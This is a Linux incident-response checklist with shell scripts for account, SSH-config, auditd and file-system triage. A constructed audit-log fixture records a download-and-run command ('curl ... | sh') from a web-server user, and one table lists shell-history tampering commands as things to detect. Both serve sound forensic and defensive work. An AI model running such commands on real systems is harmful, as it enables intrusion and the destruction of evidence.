What | Where | Notes |
---|---|---|
review shell history files | ~/.*_history (.bash_history, .zsh_history, .mysql_history, .python_history...) | may be empty, truncated or a symlink to /dev/null, which is itself a finding |
temp. editor files | ~/.viminfo, ~/.vim/, ~/.lesshst, ~/.sqlite_history, editor swap files (.*.swp) | record files opened/edited even when the shell history was cleared |
What | Where | Notes |
---|---|---|
hidden files | everywhere, especially /tmp, /dev/shm, home dirs and the web root | names starting with "." or consisting only of dots/spaces ("...", ". ") |
temp. files | /tmp, /dev/shm | look in /etc/fstab (and mount) for tmpfs mounts; contents are lost on reboot, so collect them first |
incorrect permissions | world-writable files/dirs, writable files outside the usual temp locations | |
file owners | e.g. files within the web root not owned by the expected user, root-owned files in user dirs | stack owner:group counts and look at the rare combinations |
symlinks/aliases | | symlinks pointing outside the expected tree (e.g. from the web root to /etc) |
SUID/SGID | find / -type f \( -perm -4000 -o -perm -2000 \) | compare against a clean install or the package manager's expected list |
What | Where | Notes |
---|---|---|
scan for webshells | web root | limit to known file extensions (php, jsp, aspx...) and file size; also check files whose content does not match their extension |
upload/download activity | ftp, curl, wget, perl/python, scp, sftp, browser history, web logs | |
What | Where | Notes |
---|---|---|
suspicious software installed via package manager | /var/log/yum.log, /var/log/dpkg.log, /var/log/apt/history.log... | nmap, openssh... |
sources within package managers | /etc/apt/sources.list(.d), /etc/yum.repos.d | added third-party repositories |
pre/post scripts/commands from dependencies with package managers | e.g. npm postinstall scripts stealing env. variables or executing something malicious after install | |
application specific logs | database etc. | |
kernel modules | lsmod, /proc/modules, /lib/modules | |
suspicious accounts | /etc/passwd | look for extra users with UID 0 (root) and for service accounts with interactive shells |
suspicious accounts | /etc/sudoers (and /etc/sudoers.d/) | |
suspicious accounts | /etc/shadow | look for accounts with no password set (empty second field) |
env variables | env, /proc/<pid>/environ | also look for scripts/tools which echo them out, as sensitive information (credentials, tokens) may be contained within them |
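The account checks in the three /etc/passwd and /etc/shadow rows above, as an added shell example (not part of the original checklist). It runs against copies of the two files, so it works on a mounted image as well as a live box; the passwd/shadow content below is constructed sample data, and the 1000 UID boundary is an assumption (check login.defs on the host).

```shell
#!/bin/sh
# Added example (not part of the original checklist): account review over
# passwd/shadow style files. Point it at copies pulled from an image, or at
# /etc/passwd and /etc/shadow on a live box (shadow needs root).
# Usage: audit_accounts PASSWD SHADOW   -> one finding per line

audit_accounts() {
    passwd="$1"; shadow="$2"
    # Any UID 0 account besides root is a second superuser.
    awk -F: '$3 == 0 && $1 != "root" { print "UID0:" $1 }' "$passwd"
    # System-range UIDs (< 1000 assumed here) carrying an interactive shell:
    # service accounts should have nologin/false.
    awk -F: '$3 != 0 && $3 < 1000 && $7 ~ /\/(ba|z|da)?sh$/ \
        { print "SYSTEM_SHELL:" $1 ":" $7 }' "$passwd"
    # Empty password hash in shadow: login without a password where PAM permits it.
    awk -F: '$2 == "" { print "NOPASS:" $1 }' "$shadow"
    # Entries in one file without a counterpart in the other point to manual edits.
    awk -F: 'NR == FNR { seen[$1] = 1; next } !($1 in seen) { print "ORPHAN_SHADOW:" $1 }' \
        "$passwd" "$shadow"
    awk -F: 'NR == FNR { seen[$1] = 1; next } !($1 in seen) { print "NO_SHADOW:" $1 }' \
        "$shadow" "$passwd"
    return 0
}

# Constructed sample data so the script runs stand-alone.
make_samples() {
    dir=$(mktemp -d)
    cat > "$dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
alice:x:1000:1000:Alice:/home/alice:/bin/bash
toor:x:0:0::/root:/bin/bash
backup:x:34:34:backup:/var/backups:/bin/bash
EOF
    cat > "$dir/shadow" <<'EOF'
root:$6$abc:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
www-data:*:19000:0:99999:7:::
sync:*:19000:0:99999:7:::
alice::19000:0:99999:7:::
toor:$6$def:19000:0:99999:7:::
backup:*:19000:0:99999:7:::
svc:$6$ghi:19000:0:99999:7:::
EOF
    printf '%s\n' "$dir"
}

if [ "${1:-}" = "--demo" ]; then
    d=$(make_samples)
    audit_accounts "$d/passwd" "$d/shadow"
fi
```

Run with `--demo` to see the four findings in the sample (toor as a second UID 0, backup with a login shell, alice without a password, svc present only in shadow). Every line it prints needs a human decision; a shell on a service account is sometimes legitimate, an extra UID 0 account almost never is.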
What | Where | Notes |
---|---|---|
SSH | /etc/ssh/sshd_config: PasswordAuthentication yes | password authentication permitted (brute-forceable); absent keyword means the default, which is yes |
SSH | /etc/ssh/sshd_config: PermitRootLogin yes | root login permitted, no per-user attribution |
SSH | /etc/ssh/sshd_config: MaxAuthTries | max failed logons per connection (default 6) |
3rd party within web root | outdated CMS/plugins, file upload functionality | incorrect permissions and missing file validation on uploads |
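A check for the three sshd_config settings in the table, as an added example (not from the original page). It applies the rules sshd itself uses: the first occurrence of a keyword wins, keywords are case-insensitive, settings after a Match block are conditional, and a missing keyword means the compiled-in default. The two sample configs are constructed; the PermitRootLogin default of prohibit-password assumes a current OpenSSH, and Include directives are not followed.

```shell
#!/bin/sh
# Added example: check an sshd_config for the weak settings in the table.
# sshd takes the FIRST value it sees for a keyword (keywords are case-insensitive),
# anything after a Match block is conditional, and a missing keyword means the
# compiled-in default: PasswordAuthentication yes, MaxAuthTries 6 and, on current
# OpenSSH, PermitRootLogin prohibit-password. Include directives are not followed.
# Usage: check_sshd_config FILE   -> OK/FAIL per setting, returns 1 if anything FAILs

sshd_get() {  # effective global value of keyword $2 in file $1
    awk -v key="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" '
        /^[[:space:]]*(#|$)/      { next }           # comments / blank lines
        tolower($1) == "match"    { exit }           # global section ends here
        tolower($1) == key        { print $2; exit } # first match wins
    ' "$1"
}

check_sshd_config() {
    f="$1"; rc=0
    pa=$(sshd_get "$f" PasswordAuthentication); pa=${pa:-yes}
    prl=$(sshd_get "$f" PermitRootLogin);      prl=${prl:-prohibit-password}
    mat=$(sshd_get "$f" MaxAuthTries);         mat=${mat:-6}
    if [ "$pa" = "yes" ]; then echo "FAIL PasswordAuthentication=$pa (brute-forceable; prefer keys)"; rc=1
    else echo "OK   PasswordAuthentication=$pa"; fi
    if [ "$prl" = "yes" ]; then echo "FAIL PermitRootLogin=$prl (no per-user attribution)"; rc=1
    else echo "OK   PermitRootLogin=$prl"; fi
    if [ "$mat" -gt 6 ] 2>/dev/null; then echo "FAIL MaxAuthTries=$mat (default is 6)"; rc=1
    else echo "OK   MaxAuthTries=$mat"; fi
    return $rc
}

# Constructed samples: the weak configuration beside its hardened form.
make_sshd_samples() {
    d=$(mktemp -d)
    cat > "$d/sshd_config.weak" <<'EOF'
# PasswordAuthentication no      <- commented out, so the default (yes) applies
PermitRootLogin yes
MaxAuthTries 10
EOF
    cat > "$d/sshd_config.hardened" <<'EOF'
PasswordAuthentication no
permitrootlogin no
MaxAuthTries 3
Match User backup
    PasswordAuthentication yes   # conditional, does not change the global value
EOF
    printf '%s\n' "$d"
}

if [ "${1:-}" = "--demo" ]; then
    d=$(make_sshd_samples)
    for c in weak hardened; do echo "== $c"; check_sshd_config "$d/sshd_config.$c"; done
fi
```

The commented-out `PasswordAuthentication no` in the weak sample is the common mistake: the line looks hardened on a quick grep, but sshd never sees it. On a live host, `sshd -T` prints the effective configuration (including Include files) and is the authoritative source; the script is for offline copies.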
What | Where | Notes |
---|---|---|
numerous failed attempts | single user | brute force / password guessing against one account |
numerous failed logons | /var/log/(b | u |
SSH | ssh -T | sessions without a pty (ssh -T, remote commands) leave no utmp/wtmp entry, so they are missing from who/last; check the auth logs instead |
SSH | ~/.ssh/known_hosts | hosts the account has connected to (lateral movement); entries may be hashed (HashKnownHosts) |
SSH | ~/.ssh/authorized_keys | keys added for persistence; compare against the user's own keys |
priv. escalation | sudo/su (/var/log/auth*.log*, /var/log/secure*, /var/log/sudo*.log*) | |
correlation of source IP/hostname for users logging on | | makes shared accounts and logins from places that aren't normal easy to see |
from suspicious processes | web server processes | e.g., explicit creds used to authenticate where the logon process is C:\Windows\System32\inetsrv\InetMgr.exe (Windows example); on Linux, look for logons or shells whose parent is the web server process |
What | Where | Notes |
---|---|---|
cron jobs | /etc/crontab, /etc/cron.*/, /var/spool/cron/ (crontab -l per user) | |
init.d scripts | /etc/init.d/, /etc/rc*.d/ | |
symlinks | | e.g. a service script or binary replaced by a symlink to an attacker-controlled file |
trojanized binaries | | verify against the package database (rpm -Va, debsums) or known-good hashes |
added to .bashrc/.profile/.bash_aliases | ~/.bashrc, ~/.profile, ~/.bash_aliases, /etc/profile, /etc/profile.d/, /etc/bash.bashrc | runs on every login/shell start |
web browser plugins/extensions/addons | | |
LD_PRELOAD | /etc/ld.so.preload, environment of running processes and login scripts | a listed library is loaded into every dynamically linked process |
LD_LIBRARY_PATH | environment of running processes and login scripts | |
Upstart | /etc/init/ | |
SysVinit | /etc/init.d/, /etc/inittab | |
webshells | web root | |
What | Where | Notes |
---|---|---|
processes with no file on disk | /proc/<pid>/exe pointing to "(deleted)" or a memfd: path | binary removed after start, or loaded straight into memory |
reverse shells/tunnelers/listeners | CLI args. via auditd (execve records), /proc/<pid>/cmdline | |
parent/child relationships | ps -ef --forest, pstree | e.g., a shell whose parent is the web server or database process |
What | Where | Notes |
---|---|---|
sockets | ss -tulpn (or netstat -tulpn), /proc/net/tcp, /proc/<pid>/fd | listening ports and established connections with owning process |
DNS cache | only present if a caching resolver runs (systemd-resolved, nscd, dnsmasq) | |
hosts file | /etc/hosts | redirected update/AV/C2 hostnames |
What | Where | Notes |
---|---|---|
tampering with shell history | unset HISTFILE, HISTSIZE=0, HISTFILESIZE=0, history -c, ln -s /dev/null ~/.bash_history, > ~/.bash_history | look in login scripts and at the history file itself (empty, symlinked, mtime older than last login) |
gaps within logs | /var/log/ files and/or web logs | e.g., attacker using something like the white cat log cleaner; look for jumps in timestamps, sequence gaps and unexpected file sizes |
What | Where | Notes |
---|---|---|
Distro info. | /etc/*-release, /etc/os-release | |
Install date | /etc/ssh/ssh_host_*_key files | usually created during install |
System name | /etc/hostname | |
IP address(es) | /etc/hosts, /etc/network/interfaces, /etc/sysconfig/network-scripts/, /etc/netplan/ | static |
IP address(es) | /var/lib/dhclient/*.leases, /var/lib/dhcp/ | DHCP |
Timezone | /etc/localtime | binary tzfile, needs to be decoded (strings or zdump); often a symlink into /usr/share/zoneinfo, which gives the name directly |
What | Description | Notes |
---|---|---|
AuditD | exec & connect syscalls, file integrity (watches), priv. escalation | all records of one event (SYSCALL, EXECVE, CWD, PATH, SOCKADDR...) share the same msg=audit(epoch:serial) value; that epoch:serial in () is the key to track/correlate the additional event entries |
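The correlation described in the AuditD row, as an added example that is not part of the original page: records are grouped on the epoch:serial inside `audit(...)`, and the EXECVE arguments and SOCKADDR peer are joined onto the SYSCALL line so each event reads as one line. The audit.log excerpt is constructed (198.51.100.7 is a documentation-range address), and the `exec`/`connect` keys assume rules of the form `-a always,exit -F arch=b64 -S execve -k exec` and `-S connect -k connect`.

```shell
#!/bin/sh
# Added example: join auditd records that share one msg=audit(epoch:serial) key.
# Assumes rules tagged -k exec (execve) and -k connect (connect); for offline
# copies of /var/log/audit/audit.log. On a live box `ausearch -i` does the same.
# Usage: correlate_audit FILE   -> one line per event

correlate_audit() {
    awk '
    function hex2dec(h,   i, n) {
        n = 0; h = toupper(h)
        for (i = 1; i <= length(h); i++) n = n * 16 + index("0123456789ABCDEF", substr(h, i, 1)) - 1
        return n
    }
    # value of name=... on an audit line; the leading space avoids uid/auid/euid mixups
    function field(line, name,   pat, v) {
        pat = " " name "=\"[^\"]*\""
        if (match(line, pat)) { v = substr(line, RSTART, RLENGTH); sub(/^[^"]*"/, "", v); sub(/"$/, "", v); return v }
        pat = " " name "=[^ ]*"
        if (match(line, pat)) { v = substr(line, RSTART, RLENGTH); sub(/^[^=]*=/, "", v); return v }
        return ""
    }
    {
        if (!match($0, /audit\([0-9.]+:[0-9]+\)/)) next
        id = substr($0, RSTART + 6, RLENGTH - 7)          # "epoch:serial"
        split(id, p, ":"); serial = p[2]
        if (!(serial in seen)) { order[++n] = serial; seen[serial] = 1; tstamp[serial] = p[1] }
        if ($1 == "type=SYSCALL") {
            key[serial] = field($0, "key"); uid[serial] = field($0, "uid")
            exe[serial] = field($0, "exe"); pid[serial] = field($0, "pid")
        } else if ($1 == "type=EXECVE") {                  # argv is spread over a0..aN
            argc = field($0, "argc"); cmd = ""
            for (i = 0; i < argc; i++) { sep = (i > 0) ? " " : ""; cmd = cmd sep field($0, "a" i) }
            argv[serial] = cmd
        } else if ($1 == "type=CWD") {
            cwd[serial] = field($0, "cwd")
        } else if ($1 == "type=SOCKADDR") {                # hex struct sockaddr; decode AF_INET only
            s = field($0, "saddr")
            if (substr(s, 1, 4) == "0200")
                peer[serial] = hex2dec(substr(s, 9, 2)) "." hex2dec(substr(s, 11, 2)) "." \
                               hex2dec(substr(s, 13, 2)) "." hex2dec(substr(s, 15, 2)) ":" hex2dec(substr(s, 5, 4))
        }
    }
    END {
        for (i = 1; i <= n; i++) {
            s = order[i]
            printf "%s %s key=%s uid=%s pid=%s exe=%s cwd=%s argv=[%s] peer=%s\n",
                   tstamp[s], s, key[s], uid[s], pid[s], exe[s], cwd[s], argv[s], peer[s]
        }
    }' "$1"
}

# Constructed audit.log excerpt: a web server user running a download-and-pipe,
# followed by the outbound connect from the spawned curl.
make_audit_sample() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
type=SYSCALL msg=audit(1700000000.123:4242): arch=c000003e syscall=59 success=yes exit=0 a0=55d1 a1=55d2 a2=55d3 a3=0 items=2 ppid=1337 pid=1340 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="sh" exe="/usr/bin/dash" key="exec"
type=EXECVE msg=audit(1700000000.123:4242): argc=3 a0="sh" a1="-c" a2="curl http://198.51.100.7/x | sh"
type=CWD msg=audit(1700000000.123:4242): cwd="/var/www/html"
type=PATH msg=audit(1700000000.123:4242): item=0 name="/bin/sh" inode=1234 dev=fd:01 mode=0100755 ouid=0 ogid=0 rdev=00:00
type=PROCTITLE msg=audit(1700000000.123:4242): proctitle=7368002D6300
type=SYSCALL msg=audit(1700000000.456:4243): arch=c000003e syscall=42 success=yes exit=0 a0=3 a1=7ffd a2=10 a3=0 items=0 ppid=1340 pid=1342 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="curl" exe="/usr/bin/curl" key="connect"
type=SOCKADDR msg=audit(1700000000.456:4243): saddr=02000050C63364070000000000000000
EOF
    printf '%s\n' "$f"
}

if [ "${1:-}" = "--demo" ]; then correlate_audit "$(make_audit_sample)"; fi
```

The second event's ppid (1340) is the pid of the first, which is the parent/child link the process table would have shown while it was still running; with the records joined, the uid=33 shell, its working directory under the web root, the full command line and the peer it reached out to are all on two lines instead of seven.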
- Review shell history
- Review tmpfs (/tmp, /dev/shm, tmpfs entries in /etc/fstab etc.)
- Review history files of editing applications for files accessed/changed (.lesshst, .viminfo etc.)
- Look for hidden files/directories
- Review hits from webshell and A/V scans
- Look at listening ports
- Look at the process listing (CLI, working directories, parent/child relationships, uptime etc.)
- Review SSH related files (authorized_keys, known_hosts, sshd_config etc.)
- Stack permissions of files/directories to spot excessive privileges
- Stack owner/group of files/directories to spot anomalies
- Review crontabs
- Query IPs/file hashes (known trojanized binaries, C2s etc.)
- Review installed applications from package managers
- Consolidate file listings into a timeline view -> filter/grep/time slice
- Look at the shells assigned to users (/etc/passwd)
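The file-system items in the checklist (hidden files, permissions, SUID/SGID, owner stacking and the file timeline), as one added shell example that is not part of the original page. The tree it builds is a constructed sample with one planted file per finding; the permission and name checks are POSIX find, while the timeline assumes GNU findutils for `-printf`.

```shell
#!/bin/sh
# Added example: stack permissions, ownership and names over a tree, then build
# an mtime-sorted timeline. Point ROOT at a mounted image rather than / on a
# live box where possible (find updates atimes unless mounted noatime/ro).
# Usage: find_anomalies ROOT ; stack_owners ROOT ; file_timeline ROOT

find_anomalies() {
    root="$1"
    # set-uid / set-gid binaries: diff against a clean install or the package DB
    find "$root" -type f -perm -4000 | sed 's/^/SUID /'
    find "$root" -type f -perm -2000 | sed 's/^/SGID /'
    # world-writable files and directories: anything there can be replaced or planted
    find "$root" \( -type f -o -type d \) -perm -0002 | sed 's/^/WW /'
    # hidden names, including the "..." and ". " style directories attackers favour
    find "$root" -name '.*' ! -name . ! -name .. | sed 's/^/HIDDEN /'
}

stack_owners() {
    # owner:group frequency; the rare combinations are the ones to look at
    find "$1" -exec ls -ld {} + | awk '{ print $3 ":" $4 }' | sort | uniq -c | sort -rn
}

file_timeline() {
    # epoch mtime, mode, owner, size, path (GNU find); sort -n gives the chronological
    # view, then time-slice with e.g. awk '$1 > 1700000000'
    find "$1" -printf '%T@ %M %u %s %p\n' | sort -n
}

# Constructed sample tree: one planted artefact per check.
make_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/bin" "$d/var/www/html" "$d/tmp/..."
    chmod 0755 "$d/bin" "$d/var" "$d/var/www" "$d/var/www/html" "$d/tmp" "$d/tmp/..."
    printf '#!/bin/sh\nid\n' > "$d/bin/rootme";  chmod 4755 "$d/bin/rootme"     # planted SUID
    printf 'x\n' > "$d/bin/shared";             chmod 2755 "$d/bin/shared"     # SGID
    printf 'placeholder\n' > "$d/var/www/html/.cache.php"
    chmod 0644 "$d/var/www/html/.cache.php"                                      # hidden file in web root
    printf 'x\n' > "$d/tmp/.../payload";        chmod 0666 "$d/tmp/.../payload" # world-writable in hidden dir
    printf 'x\n' > "$d/bin/old";                chmod 0644 "$d/bin/old"
    touch -t 202001010000 "$d/bin/old"          # back-dated: should surface first in the timeline
    printf '%s\n' "$d"
}

if [ "${1:-}" = "--demo" ]; then
    d=$(make_tree)
    find_anomalies "$d"; stack_owners "$d"; file_timeline "$d"
fi
```

Back-dating is the reason the timeline is only a starting point: `touch -t` rewrites mtime freely, so a file that sorts "old" may still be new. On ext4 the inode change time (ctime) and birth time (`stat`, `debugfs`) are not settable through touch and are worth comparing against the mtime of anything suspicious.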